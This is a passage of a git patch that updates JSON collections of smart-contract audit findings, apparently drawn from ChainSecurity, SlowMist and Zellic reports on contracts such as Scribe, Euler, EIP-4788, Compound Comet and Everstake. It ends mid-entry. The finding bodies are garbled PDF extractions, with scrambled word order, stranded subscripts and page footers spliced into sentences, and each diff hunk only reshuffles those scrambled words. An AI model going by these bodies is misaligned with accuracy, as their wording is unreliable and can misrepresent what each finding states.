From 2bd34eef446653401d9cbadca5bfab19d5a1fe48 Mon Sep 17 00:00:00 2001 From: automatoour Date: Mon, 9 Sep 2024 04:09:11 +0000 Subject: [PATCH] updated: data sources 2024-09-09 --- results/chainsecurity_findings.json | 16 +- results/slowmist_findings.json | 77 + results/zellic_findings.json | 3784 +++++++++++++++++++++++++++ 3 files changed, 3869 insertions(+), 8 deletions(-) diff --git a/results/chainsecurity_findings.json b/results/chainsecurity_findings.json index a785679..773115c 100644 --- a/results/chainsecurity_findings.json +++ b/results/chainsecurity_findings.json @@ -177,7 +177,7 @@ }, { "title": "5.3 Lift Does Not Drop Unfinalized opPoke", - "body": " ScribeOptimistic generally drops unfinalized optimistic poke data after the update of parameters to avoid any issues connected to an unexpected change of the verification result. _lift() is not overridden in ScribeOptimistic to call _afterAuthedAction() which drops the unfinalized opPokeData. This may allow not yet but soon to be feeds to sign the price update. CS-CSC-003 Assume Alice is not a member of the current feeds at t and t < t < t . 2 , Alice signs a price with other bar-1 feeds, and opPoke() it. 0 0 1 At t 0 At t 1 At t 2 , wards add Alice to the feeds. pokeData becomes valid. , one comes to challenge the opPokeData, the challenge fails (verification succeeds) and the In this example, Alice's signed data successfully passes the verification, though Alice has not been authorized at t , the time the price data was aggregated. 0 Risk accepted: Chronicle states: Chronicle - Scribe - 14 DesignLowVersion1RiskAcceptedCorrectnessLowVersion1RiskAccepted \fThis is a valid issue from a theoretical point of view. However, practically we don't see any problems arising through this. ", + "body": " ScribeOptimistic generally drops unfinalized optimistic poke data after the update of parameters to avoid any issues connected to an unexpected change of the verification result. _lift() is not overridden in ScribeOptimistic to call _afterAuthedAction() which drops the unfinalized opPokeData. This may allow not yet but soon to be feeds to sign the price update. CS-CSC-003 Assume Alice is not a member of the current feeds at t and t < t < t . 2 , Alice signs a price with other bar-1 feeds, and opPoke() it. 1 0 0 At t 0 At t 1 At t 2 , wards add Alice to the feeds. pokeData becomes valid. , one comes to challenge the opPokeData, the challenge fails (verification succeeds) and the In this example, Alice's signed data successfully passes the verification, though Alice has not been authorized at t , the time the price data was aggregated. 0 Risk accepted: Chronicle states: Chronicle - Scribe - 14 DesignLowVersion1RiskAcceptedCorrectnessLowVersion1RiskAccepted \fThis is a valid issue from a theoretical point of view. However, practically we don't see any problems arising through this. ", "labels": [ "ChainSecurity" ], @@ -217,7 +217,7 @@ }, { "title": "6.5 Gas Optimizations", - "body": " getSignerIndexLength() could load the length by assembly. In _verifySchnorrSignature(), lift(), and drop() the counter i inside of the for loop can be increased in an unchecked scope, as it is always bounded. CS-CSC-010 There is no amount limitation of inputs for abi.encodePacked(), thus one invocation should and constructPokeMessage() parameters the all in suffice _constructOpPokeMessage(). pack to In _verifySchnorrSignature(), loading a public key at an index can be abstracted into another internal function to decrease code duplication. In _lift(), the require statement index <= maxFeeds can be moved into the if branch, as we only need to check the number of feeds when a new public key is added. Chronicle - Scribe - 18 CorrectnessLowVersion1Speci\ufb01cationChangedDesignLowVersion1CodeCorrectedInformationalVersion1CodeCorrected \f The first condition check (opPokeDataFinalized) can be removed in _opPoke(), as the function would already revert if it is false. if (!opPokeDataFinalized) { revert InChallengePeriod(); } uint32 age = opPokeDataFinalized && opPokeData.age > _pokeData.age ? opPokeData.age : _pokeData.age; In LibSchnorr, the following line can be wrapped in an unchecked scope. uint s = LibSecp256k1.Q() - mulmod(challenge, pubKey.x, LibSecp256k1.Q()); In addAffinePoint(), some intermediate results can be cached to avoid computing repeatedly. For example: uint left = mulmod(addmod(z1, h, _P), addmod(z1, h, _P), _P); uint v = mulmod(x1, mulmod(4, mulmod(h, h, _P), _P), _P); uint j = mulmod(4, mulmod(h, mulmod(h, h, _P), _P), _P); In addition, the following optimizations only work if the external view functions are called by a smart contract. In feeds(), the for loop counter i can start from 1 as the public key at index 0 is an zero point. And i can be increased in an unchecked scope. In feeds(uint index), the input index can be checked towards 0 for early revert. And the public key at a specific index is not loaded by assembly as before. Code has been corrected to adopt some of the optimizations. Chronicle - Scribe - 19 \f7 Informational We utilize this section to point out informational findings that are less severe than issues. These informational issues allow us to point out more theoretical findings. Their explanation hopefully improves the overall understanding of the project's security. Furthermore, we point out findings which are unrelated to security. ", + "body": " getSignerIndexLength() could load the length by assembly. In _verifySchnorrSignature(), lift(), and drop() the counter i inside of the for loop can be increased in an unchecked scope, as it is always bounded. CS-CSC-010 There is no amount limitation of inputs for abi.encodePacked(), thus one invocation should and constructPokeMessage() parameters pack the to in suffice _constructOpPokeMessage(). all In _verifySchnorrSignature(), loading a public key at an index can be abstracted into another internal function to decrease code duplication. In _lift(), the require statement index <= maxFeeds can be moved into the if branch, as we only need to check the number of feeds when a new public key is added. Chronicle - Scribe - 18 CorrectnessLowVersion1Speci\ufb01cationChangedDesignLowVersion1CodeCorrectedInformationalVersion1CodeCorrected \f The first condition check (opPokeDataFinalized) can be removed in _opPoke(), as the function would already revert if it is false. if (!opPokeDataFinalized) { revert InChallengePeriod(); } uint32 age = opPokeDataFinalized && opPokeData.age > _pokeData.age ? opPokeData.age : _pokeData.age; In LibSchnorr, the following line can be wrapped in an unchecked scope. uint s = LibSecp256k1.Q() - mulmod(challenge, pubKey.x, LibSecp256k1.Q()); In addAffinePoint(), some intermediate results can be cached to avoid computing repeatedly. For example: uint left = mulmod(addmod(z1, h, _P), addmod(z1, h, _P), _P); uint v = mulmod(x1, mulmod(4, mulmod(h, h, _P), _P), _P); uint j = mulmod(4, mulmod(h, mulmod(h, h, _P), _P), _P); In addition, the following optimizations only work if the external view functions are called by a smart contract. In feeds(), the for loop counter i can start from 1 as the public key at index 0 is an zero point. And i can be increased in an unchecked scope. In feeds(uint index), the input index can be checked towards 0 for early revert. And the public key at a specific index is not loaded by assembly as before. Code has been corrected to adopt some of the optimizations. Chronicle - Scribe - 19 \f7 Informational We utilize this section to point out informational findings that are less severe than issues. These informational issues allow us to point out more theoretical findings. Their explanation hopefully improves the overall understanding of the project's security. Furthermore, we point out findings which are unrelated to security. ", "labels": [ "ChainSecurity" ], @@ -4921,7 +4921,7 @@ }, { "title": "7.2 Code Inconsistencies", - "body": " CS-GEARV21-006 1. For gas optimizations, the system tries to always keep 1 wei in the balances and the standard way in is with balance <= 1, codebase however across to BlacklistHelper.claim() the check is amount < 2. check the it 2. The Lido gateway transfers the full balance instead of balance-1 as everywhere else in the system (gas optimization). 3. In the adapters, _gearboxAdapterType is sometimes overridden as a constant, and some other times as a function. For consistency across the codebase, one of the two solutions should be chosen. Code partially corrected: 1. Changed to amount < 1. 2. Not addressed. 3. Not addressed. ", + "body": " CS-GEARV21-006 1. For gas optimizations, the system tries to always keep 1 wei in the balances and the standard way in is with balance <= 1, codebase however to BlacklistHelper.claim() the check is amount < 2. across check the it 2. The Lido gateway transfers the full balance instead of balance-1 as everywhere else in the system (gas optimization). 3. In the adapters, _gearboxAdapterType is sometimes overridden as a constant, and some other times as a function. For consistency across the codebase, one of the two solutions should be chosen. Code partially corrected: 1. Changed to amount < 1. 2. Not addressed. 3. Not addressed. ", "labels": [ "ChainSecurity" ], @@ -5633,7 +5633,7 @@ }, { "title": "6.1 Gas Optimizations", - "body": " 0 0 0 0 3 EULEVC-005 the EthereumVaultConnector contract, public functions requireAccountStatusCheck, In requireVaultStatusCheck, and requireAccountAndVaultStatusCheck are decorated with the nonReentrantChecks modifier. However, the functions perform different actions depending if checks are deferred or not. Since areChecksDeferred() and areChecksInProgress() are mutually exclusive (except transiently in the body of these functions), the reentrancy check can be moved to the internal version of the functions which is called if checks are not deferred. This saves 3 storage accesses every time one of these functions is called. Several gas optimizations can be implemented in the Set library, all pertaining to writing values into structs that share a storage slot. If a and b share a storage slot, writing a new value into a requires first loading b from storage, so that the new [a,b] value can be then written in storage. If a and b are written together, the SLOAD is prevented. The gas optimizations in question are: At the end 94 (setStorage.numElements = uint8(numElements + 1)), a storage load can be prevented by also setting setStorage.firstElement, which is known, and setStorage.stamp, which is always DUMMY_STAMP in the setStorage struct. function insert, around line of In function insert when inserting at the end of the array, line 91, the stamp value can also be written, therefore saving a storage read. To know which value to set for stamp, the element-searching loop that is performed just before (lines 85-87) can also be used to query the stamp values of the array. They will either all be set (for transient sets), or all unset (for persistent sets), so when setting stamp at index i, the value of stamp at index i - 1 can be used (i >= 1). If the second element is being inserted (i == 0), then the extra SLOAD can't be avoided, since the old value of stamp must be retrieved. In function remove, when replacing the removed element with the last element, at line 143, the stamp value can also be written to prevent an SLOAD. The stamp value to write can be known at no extra storage load costs. Euler - Ethereum Vault Connector - 15 CriticalHighMediumLowCodeCorrectedCodeCorrectedCodeCorrectedInformationalVersion1CodeCorrected \fIn function reorder, if index1 == 0, setStorage.numElements and setStorage.stamp can be set to their known values to prevent an extra SLOAD. functions forEachAndClear and forEachAndClearWithResult, when clearing In setStorage.numElements and setStorage.firstElement, setStorage.stamp can be set to DUMMY_STAMP to prevent an extra SLOAD. Because some functions are only used on transient sets (forEachandClear), and some others only on persistent sets (reorder), extra optimizations are available if we accept tighter coupling between the Set implementation and the EthereumVaultConnector: can When clearing the array elements in forEachandClear (and forEachAndClearWithResult), we since forEachAndClear() is only used on transient sets which are known to have every stamp set to DUMMY_STAMP. also write setStorage.elements[i].stamp = DUMMY_STAMP, reorder() is only used on persistent sets of accountCollaterals, which are known to have stamp value 0 for entries of the elements array. Therefore, the stamp value can be set to 0 when writing the value of entries, saving extra SLOADs After evaluation by Euler, some of the optimizations were implemented while others were considered to slightly complicate the logic of the contract or increase the gas consumption. The following optimizations were implemented: two additional internal functions, requireAccountStatusCheckInternalNonReentrant and requireVaultStatusCheckInternalNonReentrant, wrap requireVaultStatusCheckInternal requireAccountStatusCheckInternal in accordingly, have been added requireAccountStatusCheck, and requireAccountAndVaultStatusCheck functions. the EthereumVaultConnector and used requireVaultStatusCheck that and to forEachAndClear and forEachAndClearWithResult have been modified. ", + "body": " 0 0 0 0 3 EULEVC-005 the EthereumVaultConnector contract, public functions requireAccountStatusCheck, In requireVaultStatusCheck, and requireAccountAndVaultStatusCheck are decorated with the nonReentrantChecks modifier. However, the functions perform different actions depending if checks are deferred or not. Since areChecksDeferred() and areChecksInProgress() are mutually exclusive (except transiently in the body of these functions), the reentrancy check can be moved to the internal version of the functions which is called if checks are not deferred. This saves 3 storage accesses every time one of these functions is called. Several gas optimizations can be implemented in the Set library, all pertaining to writing values into structs that share a storage slot. If a and b share a storage slot, writing a new value into a requires first loading b from storage, so that the new [a,b] value can be then written in storage. If a and b are written together, the SLOAD is prevented. The gas optimizations in question are: At the end 94 (setStorage.numElements = uint8(numElements + 1)), a storage load can be prevented by also setting setStorage.firstElement, which is known, and setStorage.stamp, which is always DUMMY_STAMP in the setStorage struct. function insert, around line of In function insert when inserting at the end of the array, line 91, the stamp value can also be written, therefore saving a storage read. To know which value to set for stamp, the element-searching loop that is performed just before (lines 85-87) can also be used to query the stamp values of the array. They will either all be set (for transient sets), or all unset (for persistent sets), so when setting stamp at index i, the value of stamp at index i - 1 can be used (i >= 1). If the second element is being inserted (i == 0), then the extra SLOAD can't be avoided, since the old value of stamp must be retrieved. In function remove, when replacing the removed element with the last element, at line 143, the stamp value can also be written to prevent an SLOAD. The stamp value to write can be known at no extra storage load costs. Euler - Ethereum Vault Connector - 15 CriticalHighMediumLowCodeCorrectedCodeCorrectedCodeCorrectedInformationalVersion1CodeCorrected \fIn function reorder, if index1 == 0, setStorage.numElements and setStorage.stamp can be set to their known values to prevent an extra SLOAD. functions forEachAndClear and forEachAndClearWithResult, when clearing In setStorage.numElements and setStorage.firstElement, setStorage.stamp can be set to DUMMY_STAMP to prevent an extra SLOAD. Because some functions are only used on transient sets (forEachandClear), and some others only on persistent sets (reorder), extra optimizations are available if we accept tighter coupling between the Set implementation and the EthereumVaultConnector: can When clearing the array elements in forEachandClear (and forEachAndClearWithResult), we since forEachAndClear() is only used on transient sets which are known to have every stamp set to DUMMY_STAMP. also write setStorage.elements[i].stamp = DUMMY_STAMP, reorder() is only used on persistent sets of accountCollaterals, which are known to have stamp value 0 for entries of the elements array. Therefore, the stamp value can be set to 0 when writing the value of entries, saving extra SLOADs After evaluation by Euler, some of the optimizations were implemented while others were considered to slightly complicate the logic of the contract or increase the gas consumption. The following optimizations were implemented: two additional internal functions, requireAccountStatusCheckInternalNonReentrant and requireVaultStatusCheckInternalNonReentrant, wrap requireVaultStatusCheckInternal requireAccountStatusCheckInternal in accordingly, have been added requireAccountStatusCheck, and requireAccountAndVaultStatusCheck functions. the EthereumVaultConnector and used requireVaultStatusCheck and that to forEachAndClear and forEachAndClearWithResult have been modified. ", "labels": [ "ChainSecurity" ], @@ -9233,7 +9233,7 @@ }, { "title": "6.2 Implications of Ring Buffer Size", - "body": " The EIP-4788 states: The ring buffer data structures are sized to hold 8192 roots from the consensus layer at current slot timings. CS-EIP4788-008 Ethereum Foundation - EIP-4788 Contract - 11 CriticalHighCodeCorrectedMediumLowCodeCorrectedSpeci\ufb01cationChangedCodeCorrectedCorrectnessHighVersion1CodeCorrectedDesignLowVersion1CodeCorrectedSpeci\ufb01cationChanged \fIn at a current SECONDS_PER_SLOT = 12 on the mainnet. the code implements the circular buffer, however out of 98304 slots, only 8192 will be utilized Effectively the ring buffer behaves as a ring of integers modulo n, where n is its size. The ( current_timestamp + X * SECONDS_PER_SLOT ) mod 98304 function will produce a cyclic subgroup of order 8192 the SECONDS_PER_SLOT would change to 16, the cyclic subgroup will have order 6144, which is less than 8192. Furthermore, many old entries from the 12-second interval would uselessly remain in the ring buffer. if SECONDS_PER_SLOT is 12. However, future, the in if, Thus, the requirement of the EIP-4788 to have 8192 roots available in the ring buffer will not be satisfied if the SECONDS_PER_SLOT changes to 16 seconds. If the SECONDS_PER_SLOT changes to 13 seconds, the cyclic subgroup will have order 98304, thus increasing the storage requirements for the ring buffer by 12 times. To summarize, the 98304 as a group order for the ring buffer is not an ideal choice, as it is not a prime number. Potential changes to the SECONDS_PER_SLOT will drastically change the behavior of the ring buffer. If the ( current_timestamp + X * SECONDS_PER_SLOT ) mod 8209 function is used instead, the cyclic subgroup will always have order 8209, since it is a prime number. That would have two key advantages: The ring buffer could always hold the most recent 8209 beacon roots independent of SECONDS_PER_SLOT The storage consumption would remain constant even when SECONDS_PER_SLOT changes If the primary objective is to make sure that the ring buffer can hold all beacon roots of the past 24 hours, then a prime ring buffer size still makes sense, but a bigger one has to be chosen, according to the lowest value SECONDS_PER_SLOT might have in the future. Please note that the changes discussed here would require a change in the specification. The specification has been changed to make the ring buffer size 8191, which is a prime number. The code has been changed accordingly. Hence, the new implementation benefits from the positive effects described above. ", + "body": " The EIP-4788 states: The ring buffer data structures are sized to hold 8192 roots from the consensus layer at current slot timings. CS-EIP4788-008 Ethereum Foundation - EIP-4788 Contract - 11 CriticalHighCodeCorrectedMediumLowCodeCorrectedSpeci\ufb01cationChangedCodeCorrectedCorrectnessHighVersion1CodeCorrectedDesignLowVersion1CodeCorrectedSpeci\ufb01cationChanged \fIn at a current SECONDS_PER_SLOT = 12 on the mainnet. the code implements the circular buffer, however out of 98304 slots, only 8192 will be utilized Effectively the ring buffer behaves as a ring of integers modulo n, where n is its size. The ( current_timestamp + X * SECONDS_PER_SLOT ) mod 98304 function will produce a cyclic subgroup of order 8192 the SECONDS_PER_SLOT would change to 16, the cyclic subgroup will have order 6144, which is less than 8192. Furthermore, many old entries from the 12-second interval would uselessly remain in the ring buffer. if SECONDS_PER_SLOT is 12. However, future, the if, in Thus, the requirement of the EIP-4788 to have 8192 roots available in the ring buffer will not be satisfied if the SECONDS_PER_SLOT changes to 16 seconds. If the SECONDS_PER_SLOT changes to 13 seconds, the cyclic subgroup will have order 98304, thus increasing the storage requirements for the ring buffer by 12 times. To summarize, the 98304 as a group order for the ring buffer is not an ideal choice, as it is not a prime number. Potential changes to the SECONDS_PER_SLOT will drastically change the behavior of the ring buffer. If the ( current_timestamp + X * SECONDS_PER_SLOT ) mod 8209 function is used instead, the cyclic subgroup will always have order 8209, since it is a prime number. That would have two key advantages: The ring buffer could always hold the most recent 8209 beacon roots independent of SECONDS_PER_SLOT The storage consumption would remain constant even when SECONDS_PER_SLOT changes If the primary objective is to make sure that the ring buffer can hold all beacon roots of the past 24 hours, then a prime ring buffer size still makes sense, but a bigger one has to be chosen, according to the lowest value SECONDS_PER_SLOT might have in the future. Please note that the changes discussed here would require a change in the specification. The specification has been changed to make the ring buffer size 8191, which is a prime number. The code has been changed accordingly. Hence, the new implementation benefits from the positive effects described above. ", "labels": [ "ChainSecurity" ], @@ -11585,7 +11585,7 @@ }, { "title": "6.9 No Recovery of Accidental Token Transfers", - "body": " Possible In case an ERC-20 token other than the base tokens or collateral tokens is sent to the contract, then it cannot be recovered. Among other reasons, this might happen due to airdrops based on the base tokens or collateral tokens. A new function approveThis has been introduced to allow the governance to approve any ERC20 token to any address. Compound - Comet - 17 DesignLowVersion1CodeCorrectedDesignLowVersion1CodeCorrected \f6.10 Possible Contract Size Reductions Instead of creating an empty AssetConfig, and later returning (0, 0), the function _getPackedAsset could directly return (0, 0). The functions isBorrowCollateralized, getBorrowLiquidity, isLiquidatable and getLiquidationMargin share the same code with marginal modifications. The overlapping code could be factored out into new functions to save code size. The baseScale variable is only needed internally and is derived from decimals and can thus be defined as internal to reduce code size. The intialization of trackingSupplyIndex and trackingBorrowIndex to 0 in the initializeStorage function can be omitted. Corrected: __getPackedAsset now directly returns (0, 0) if an AssetConfig element is empty. Not corrected: Compound claims that the compiler opimizations already account for a sufficient getBorrowLiquidity, isBorrowCollateralized, size contract reduction isLiquidatable and getLiquidationMargin. in Not corrected: Compound does not want to make an exception for one variable. Corrected: trackingSupplyIndex and trackingBorrowIndex are no longer initialized to 0. ", + "body": " Possible In case an ERC-20 token other than the base tokens or collateral tokens is sent to the contract, then it cannot be recovered. Among other reasons, this might happen due to airdrops based on the base tokens or collateral tokens. A new function approveThis has been introduced to allow the governance to approve any ERC20 token to any address. Compound - Comet - 17 DesignLowVersion1CodeCorrectedDesignLowVersion1CodeCorrected \f6.10 Possible Contract Size Reductions Instead of creating an empty AssetConfig, and later returning (0, 0), the function _getPackedAsset could directly return (0, 0). The functions isBorrowCollateralized, getBorrowLiquidity, isLiquidatable and getLiquidationMargin share the same code with marginal modifications. The overlapping code could be factored out into new functions to save code size. The baseScale variable is only needed internally and is derived from decimals and can thus be defined as internal to reduce code size. The intialization of trackingSupplyIndex and trackingBorrowIndex to 0 in the initializeStorage function can be omitted. Corrected: __getPackedAsset now directly returns (0, 0) if an AssetConfig element is empty. Not corrected: Compound claims that the compiler opimizations already account for a sufficient getBorrowLiquidity, isBorrowCollateralized, contract reduction isLiquidatable and getLiquidationMargin. size in Not corrected: Compound does not want to make an exception for one variable. Corrected: trackingSupplyIndex and trackingBorrowIndex are no longer initialized to 0. ", "labels": [ "ChainSecurity" ], @@ -12393,7 +12393,7 @@ }, { "title": "6.3 Farms Rely on Token to Checkpoint", - "body": " Farm._updateFarmingState() calls checkpoint() of an external ERC20Farmable contract. Then, the ERC20Farmable contract calls Farm.farmingCheckpoint(). However, a malicious ERC20Farmable to Farm.farmingCheckpoint(). Hence, the farm checkpoints could remain without updates. implementation purposefully could leave call out the farmingCheckpoint has been removed from the farm contracts. Hence, there is no need to call it. ", + "body": " Farm._updateFarmingState() calls checkpoint() of an external ERC20Farmable contract. Then, the ERC20Farmable contract calls Farm.farmingCheckpoint(). However, a malicious ERC20Farmable to Farm.farmingCheckpoint(). Hence, the farm checkpoints could remain without updates. implementation purposefully could leave call the out farmingCheckpoint has been removed from the farm contracts. Hence, there is no need to call it. ", "labels": [ "ChainSecurity" ], @@ -17089,7 +17089,7 @@ }, { "title": "7.33 Gas Optimizations", - "body": " CS-EVERSTKB2C-011 1. The type casting from address to address is not required in Pool.initialize(), removing it might save gas during initialization depending on the compiler's optimization setting. 2. pendingValidatorPubKey is read twice from storage in Pool._deposit(), the value could be cached in memory to avoid one SLOAD. 3. The checks of the form a != b && a != c can be modified following De Morgan's law (!(a == b || a == c)) to leverage the lazy evaluation of the condition and save gas on runtime. 4. Some function arguments on call can be replaced by constants. Some examples are: Accounting._activateRound(): the variable activeRound can be replaced by 0 in the call _makeAutocompoundRoundCheckpoint(activeRound). Accounting._depositBalance(): in the call to _activateRound() of the branch > parameter replaced by if pendingTotalShare + closeCurrentRoundAmount can be BEACON_AMOUNT. (pendingAmount 0), the Accounting._depositBalance(): in the call to _depositAccount() of the branch if (depositToPendingAmount > 0), the parameter interchangedAmount will always be 0. Accounting._depositBalance(): call AUTO_COMPOUND_PENDING_SHARE_POSITION.setStorageUint256() of the branch if (depositToPendingAmount > 0), the parameter pendingTotalShare will always be 0. the in 5. The activatedSlots in the branch if (pendingTotalShare > 0) of the function Accounting._depositBalance() can be set to 1 instead of incrementing the variable to save gas on runtime. loop while and multiple (depositToPendingAmount branch 6. The if function Accounting._depositBalance can be replaced by one update for each involved variable. If the while loop was to stay, a do-while construct could save gas. The same applies in _simulateAutocompound(). variables BEACON_AMOUNT) stack >= increments the the of in pendingTotalShare 7. Setting >= (depositToPendingAmount if Accounting._depositBalance is redundant. to 0 in BEACON_AMOUNT) the of the branch function 8. The while loop in the function Accounting.withdraw() can be simplified since in the case isFullyDeposited==false, then the remaining interchangeWithPendingDeposits is zero. 9. In the branch if (withdrawFromPendingAmount > 0) function Accounting.withdraw, pendingRestakedValue - withdrawFromPendingAmount is computed twice while it could be done only once. the of Everstake - ETH B2C Staking - 28 InformationalVersion1CodeCorrected \f10. In the function Accounting.withdraw, the pendingTotalShare is read from storage twice when it could be cached in the memory. 11. In the branch if (unclaimedReward < MIN_RESTAKE_POSITION.getStorageUint256()) of the function Accounting._simulateAutocompound(), the constant 0 can be used instead of unclaimedReward statement return the of 12. When simulating the withdraw queue filling in Accounting._simulateAutocompound(), the in same way branches could done the be in is it if/else unified Withdrawer._interchangeWithdraw(). 13. The modifier Governor.onlyGovernor() does the address check after executing the code. Reverting early would save gas. 14. In the function Pool._stake(), value cannot be zero. 15. The increment i++ can be in an unchecked block in multiple for loops. 16. The function Withdrawer. _calculateValidatorClose can return only one value, as the two values are linked by a constant factor, one can easily deduce a value from the other one. 17. In the function Withdrawer._calculateWithdrawRequestAmount, the withdrawFromActiveDeposit true withdrawFromActiveDeposit > pendingTotalShare is true and is hence redundant. always will be > 0 condition if 18. In the function WithdrawRequests.add, the assignation requests._values[i] = request can be moved inside the if (requests._values[i].value == 0) block and the function can return right after. 19. In the functions WithdrawRequests.info, requests.value[i].afterFilledAmount is read twice from the storage while it could be cached to avoid one SLOAD. WithdrawRequests.claim and 20. In the functions WithdrawRequests.claim and WithdrawRequests.info, the condition requests._values[i].afterFilledAmount > actualFilledAmount can be relaxed to an if requests._values[i].afterFilledAmount == actualFilledAmount their difference is null. comparison unstrict since 21. In the function WithdrawRequests.info, requests._values.length is read from the storage at each iteration of the loop. Caching it in the memory would avoid several SLOAD. 22. In the function and set._activePendingElementIndex are both read three times from the storage when their value could be cached in the memory. set._activeValidatorIndex ValidatorList.add, 23. In the function ValidatorList.shift, set._activePendingElementIndex is read two times from the storage when its value could be cached in the memory. 24. In the _autocompoundAccount, _autoCompoundUserPendingDepositedBalance, and _withdrawFromAutocompound field pendingDepositedBalances.length of the staker is read from the storage at each iteration of the loop. Caching it in the memory would avoid several SLOAD. _autoCompoundUserBalance AutocompoundAccounting, functions, the of 25. In the first for loop of the function AutocompoundAccounting._autocompoundAccount, both staker.pendingDepositedBalances[j].period and staker.activePendingDepositedElementIndex are read twice from the storage and could be cached. 26. In AutocompoundAccounting._autocompoundAccount(), when updating the pending times status three staker.activePendingDepositedElementIndex from storage, it could be cached. pendingDeposited, execution read path one to Everstake - ETH B2C Staking - 29 \f27. In AutocompoundAccounting._autocompoundAccount(), when updating the pending status to pendingDeposited or to activated, both staker.pendingBalance.balance and staker.pendingBalance.period are read twice from storage. 28. In AutocompoundAccounting._autoCompoundUserPendingDepositedBalance(), staker.pendingBalance.period is read twice from storage. if 29. In AutocompoundAccounting._autoCompoundUserBalance(), at each iteration of the for both loop, stakerAutocompoundBalance.pendingDepositedBalances[j].balance and stakerAutocompoundBalance.pendingDepositedBalances[j].period are read twice from storage. statement condition met, the the not if of is : 30. The calls to _userActiveBalance to get only the depositedBalance could be replaced by a simple storage read to save gas. 31. At the end Accounting._simulateAutocompound(), pendingAmount == pendingRestaked always holds as if if (pendingAmount > 0) is entered, then they are both set to 0. Otherwise pendingAmount==0 and hopefully one should always have pendingAmount >= pendingRestaked meaning that there is no need to keep both var for the while loop. of The gas optimizations have been applied. ", + "body": " CS-EVERSTKB2C-011 1. The type casting from address to address is not required in Pool.initialize(), removing it might save gas during initialization depending on the compiler's optimization setting. 2. pendingValidatorPubKey is read twice from storage in Pool._deposit(), the value could be cached in memory to avoid one SLOAD. 3. The checks of the form a != b && a != c can be modified following De Morgan's law (!(a == b || a == c)) to leverage the lazy evaluation of the condition and save gas on runtime. 4. Some function arguments on call can be replaced by constants. Some examples are: Accounting._activateRound(): the variable activeRound can be replaced by 0 in the call _makeAutocompoundRoundCheckpoint(activeRound). Accounting._depositBalance(): in the call to _activateRound() of the branch > parameter replaced by if pendingTotalShare + closeCurrentRoundAmount can be BEACON_AMOUNT. (pendingAmount 0), the Accounting._depositBalance(): in the call to _depositAccount() of the branch if (depositToPendingAmount > 0), the parameter interchangedAmount will always be 0. Accounting._depositBalance(): call AUTO_COMPOUND_PENDING_SHARE_POSITION.setStorageUint256() of the branch if (depositToPendingAmount > 0), the parameter pendingTotalShare will always be 0. the in 5. The activatedSlots in the branch if (pendingTotalShare > 0) of the function Accounting._depositBalance() can be set to 1 instead of incrementing the variable to save gas on runtime. loop while and multiple (depositToPendingAmount branch 6. The if function Accounting._depositBalance can be replaced by one update for each involved variable. If the while loop was to stay, a do-while construct could save gas. The same applies in _simulateAutocompound(). variables BEACON_AMOUNT) stack >= increments the the of in pendingTotalShare 7. Setting >= (depositToPendingAmount if Accounting._depositBalance is redundant. to 0 in BEACON_AMOUNT) the of the branch function 8. The while loop in the function Accounting.withdraw() can be simplified since in the case isFullyDeposited==false, then the remaining interchangeWithPendingDeposits is zero. 9. In the branch if (withdrawFromPendingAmount > 0) function Accounting.withdraw, pendingRestakedValue - withdrawFromPendingAmount is computed twice while it could be done only once. the of Everstake - ETH B2C Staking - 28 InformationalVersion1CodeCorrected \f10. In the function Accounting.withdraw, the pendingTotalShare is read from storage twice when it could be cached in the memory. 11. In the branch if (unclaimedReward < MIN_RESTAKE_POSITION.getStorageUint256()) of the function Accounting._simulateAutocompound(), the constant 0 can be used instead of unclaimedReward statement return the of 12. When simulating the withdraw queue filling in Accounting._simulateAutocompound(), the in same way branches done the be in is it if/else unified Withdrawer._interchangeWithdraw(). could 13. The modifier Governor.onlyGovernor() does the address check after executing the code. Reverting early would save gas. 14. In the function Pool._stake(), value cannot be zero. 15. The increment i++ can be in an unchecked block in multiple for loops. 16. The function Withdrawer. _calculateValidatorClose can return only one value, as the two values are linked by a constant factor, one can easily deduce a value from the other one. 17. In the function Withdrawer._calculateWithdrawRequestAmount, the withdrawFromActiveDeposit true withdrawFromActiveDeposit > pendingTotalShare is true and is hence redundant. always will be > 0 condition if 18. In the function WithdrawRequests.add, the assignation requests._values[i] = request can be moved inside the if (requests._values[i].value == 0) block and the function can return right after. 19. In the functions WithdrawRequests.info, requests.value[i].afterFilledAmount is read twice from the storage while it could be cached to avoid one SLOAD. WithdrawRequests.claim and 20. In the functions WithdrawRequests.claim and WithdrawRequests.info, the condition requests._values[i].afterFilledAmount > actualFilledAmount can be relaxed to an if requests._values[i].afterFilledAmount == actualFilledAmount their difference is null. comparison unstrict since 21. In the function WithdrawRequests.info, requests._values.length is read from the storage at each iteration of the loop. Caching it in the memory would avoid several SLOAD. 22. In the function and set._activePendingElementIndex are both read three times from the storage when their value could be cached in the memory. set._activeValidatorIndex ValidatorList.add, 23. In the function ValidatorList.shift, set._activePendingElementIndex is read two times from the storage when its value could be cached in the memory. 24. In the _autocompoundAccount, _autoCompoundUserPendingDepositedBalance, and _withdrawFromAutocompound field pendingDepositedBalances.length of the staker is read from the storage at each iteration of the loop. Caching it in the memory would avoid several SLOAD. _autoCompoundUserBalance AutocompoundAccounting, functions, the of 25. In the first for loop of the function AutocompoundAccounting._autocompoundAccount, both staker.pendingDepositedBalances[j].period and staker.activePendingDepositedElementIndex are read twice from the storage and could be cached. 26. In AutocompoundAccounting._autocompoundAccount(), when updating the pending times status three staker.activePendingDepositedElementIndex from storage, it could be cached. pendingDeposited, execution read path one to Everstake - ETH B2C Staking - 29 \f27. In AutocompoundAccounting._autocompoundAccount(), when updating the pending status to pendingDeposited or to activated, both staker.pendingBalance.balance and staker.pendingBalance.period are read twice from storage. 28. In AutocompoundAccounting._autoCompoundUserPendingDepositedBalance(), staker.pendingBalance.period is read twice from storage. if 29. In AutocompoundAccounting._autoCompoundUserBalance(), at each iteration of the for both loop, stakerAutocompoundBalance.pendingDepositedBalances[j].balance and stakerAutocompoundBalance.pendingDepositedBalances[j].period are read twice from storage. statement condition met, the the not if of is : 30. The calls to _userActiveBalance to get only the depositedBalance could be replaced by a simple storage read to save gas. 31. At the end Accounting._simulateAutocompound(), pendingAmount == pendingRestaked always holds as if if (pendingAmount > 0) is entered, then they are both set to 0. Otherwise pendingAmount==0 and hopefully one should always have pendingAmount >= pendingRestaked meaning that there is no need to keep both var for the while loop. of The gas optimizations have been applied. ", "labels": [ "ChainSecurity" ], diff --git a/results/slowmist_findings.json b/results/slowmist_findings.json index f275912..25cb787 100644 --- a/results/slowmist_findings.json +++ b/results/slowmist_findings.json @@ -6796,5 +6796,82 @@ "Type: Others", "Severity: High" ] + }, + { + "title": "Potential Token Compatibility Issues", + "html_url": 